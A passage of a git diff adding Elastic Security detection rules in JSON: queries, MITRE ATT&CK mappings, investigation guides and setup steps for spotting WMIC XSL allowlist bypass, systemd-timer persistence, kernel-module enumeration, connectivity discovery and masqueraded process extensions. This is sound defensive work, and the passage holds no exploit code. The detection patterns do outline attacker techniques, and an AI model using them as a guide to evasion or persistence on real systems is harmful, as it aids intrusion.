in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.013", + "name": "KernelCallbackTable", + "reference": "https://attack.mitre.org/techniques/T1574/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "7dfaaa17-425c-4fe7-bd36-83705fde7c2b_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_108.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_108.json new file mode 100644 index 00000000000..96b525ec9e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_108.json @@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WMIC XSL Script Execution", + "query": "sequence by process.entity_id with maxspan = 2m\n[process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"WMIC.exe\" or process.pe.original_file_name : \"wmic.exe\") and\n process.args : (\"format*:*\", \"/format*:*\", \"*-format*:*\") and\n not process.command_line : (\"* /format:table *\", \"* /format:table\")]\n[any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : (\"jscript.dll\", \"vbscript.dll\") or file.name : (\"jscript.dll\", \"vbscript.dll\"))]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7f370d54-c0eb-4270-ac5a-9a6020585dc6", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1220", + "name": "XSL Script Processing", + "reference": "https://attack.mitre.org/techniques/T1220/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "7f370d54-c0eb-4270-ac5a-9a6020585dc6_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_102.json b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_102.json new file mode 100644 index 00000000000..80ff4defcb9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_102.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of built-in tools attackers can use to check for Internet connectivity on compromised systems. These results may be used to determine communication capabilities with C2 servers, or to identify routes, redirectors, and proxy servers.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Discovery of Internet Capabilities via Built-in Tools", + "new_terms_fields": [ + "host.id", + "user.id", + "process.command_line" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and \nprocess.name.caseless:(\"ping.exe\" or \"tracert.exe\" or \"pathping.exe\") and\nnot process.args:(\"127.0.0.1\" or \"0.0.0.0\" or \"localhost\" or \"::1\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "7f89afef-9fc5-4e7b-bf16-75ffdf27f8db", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/", + "subtechnique": [ + { + "id": "T1016.001", + "name": "Internet Connection Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 102 + }, + "id": "7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_102", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_9.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_9.json new file mode 100644 index 00000000000..6f442916fd8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_9.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New Systemd Timer Created", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type : \"linux\" and event.action : (\"creation\" or \"file_create_event\") and file.extension : \"timer\" and\nfile.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or \n/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not (\n (process.name : (\n \"docker\" or \"dockerd\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\" or \"executor\" or \"cloudflared\" or \"pacman\" or \"podman\" or \n \"pamac-daemon\"\n ))\n or (file.name:apt-*.timer)\n)\n", + "references": [ + "https://opensource.com/article/20/7/systemd-timers", + "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "7fb500fa-8e24-4bd1-9480-2a819352602c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.006", + "name": "Systemd Timers", + "reference": "https://attack.mitre.org/techniques/T1053/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "7fb500fa-8e24-4bd1-9480-2a819352602c_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_105.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_105.json new file mode 100644 index 00000000000..3d2db72e0b7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_105.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules.", + "false_positives": [ + "Security tools and device drivers may run these programs in order to enumerate kernel modules. Use of these programs by ordinary users is uncommon. These can be exempted by process name or username." + ], + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Kernel Modules via Proc", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and file.path:\"/proc/modules\"\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 105 + }, + "id": "80084fa9-8677-4453-8680-b891d3c0c778_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_106.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_106.json new file mode 100644 index 00000000000..4b694d1b55f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_106.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules.", + "false_positives": [ + "Security tools and device drivers may run these programs in order to enumerate kernel modules. Use of these programs by ordinary users is uncommon. These can be exempted by process name or username." + ], + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Enumeration of Kernel Modules via Proc", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and file.path:\"/proc/modules\" and\nnot process.name:(grep or python* or chef-client)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 106 + }, + "id": "80084fa9-8677-4453-8680-b891d3c0c778_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_3.json b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_3.json new file mode 100644 index 00000000000..2fb950fafcf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_3.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies processes running with unusual extensions that are not typically valid for Windows executables.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process Extension", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"?*\" and \n not process.name : (\"*.exe\", \"*.com\", \"*.scr\", \"*.tmp\", \"*.dat\") and\n not process.executable : \n (\n \"MemCompression\",\n \"Registry\",\n \"vmmem\",\n \"vmmemWSL\",\n \"?:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\*.p5x\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\com.docker.service\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Intel\\\\AGS\\\\Libs\\\\AGSRunner.bin\"\n ) and\n not (\n (process.name : \"C9632CF058AE4321B6B0B5EA39B710FE\" and process.code_signature.subject_name == \"Dell Inc\") or\n (process.name : \"*.upd\" and process.code_signature.subject_name == \"Bloomberg LP\") or\n (process.name: \"FD552E21-686E-413C-931D-3B82A9D29F3B\" and process.code_signature.subject_name: \"Adobe Inc.\") or\n (process.name: \"3B91051C-AE82-43C9-BCEF-0309CD2DD9EB\" and process.code_signature.subject_name: \"McAfee, LLC\") or\n (process.name: \"soffice.bin\" and process.code_signature.subject_name: \"The Document Foundation\") or\n (process.name: (\"VeeamVixProxy_*\", \"{????????-????-????-????-????????????}\") and process.code_signature.subject_name: \"Veeam Software Group GmbH\") or\n (process.name: \"1cv8p64.bin\" and process.code_signature.subject_name: \"LLC 1C-Soft\") or\n (process.name: \"AGSRunner.bin\" and process.code_signature.subject_name: \"Intel Corporation\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "800e01be-a7a4-46d0-8de9-69f3c9582b44", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.008", + "name": "Masquerade File Type", + "reference": "https://attack.mitre.org/techniques/T1036/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "800e01be-a7a4-46d0-8de9-69f3c9582b44_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_3.json b/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_3.json new file mode 100644 index 00000000000..7e068d842d1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "An anomaly detection job has detected a remote file transfer with a rare extension, which could indicate potential lateral movement activity on the host.", + "from": "now-90m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_rare_file_extension_remote_transfer", + "name": "Unusual Remote File Extension", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "814d96c7-2068-42aa-ba8e-fe0ddd565e2e", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. For example, this would be `logs-endpoint.events.*` if you 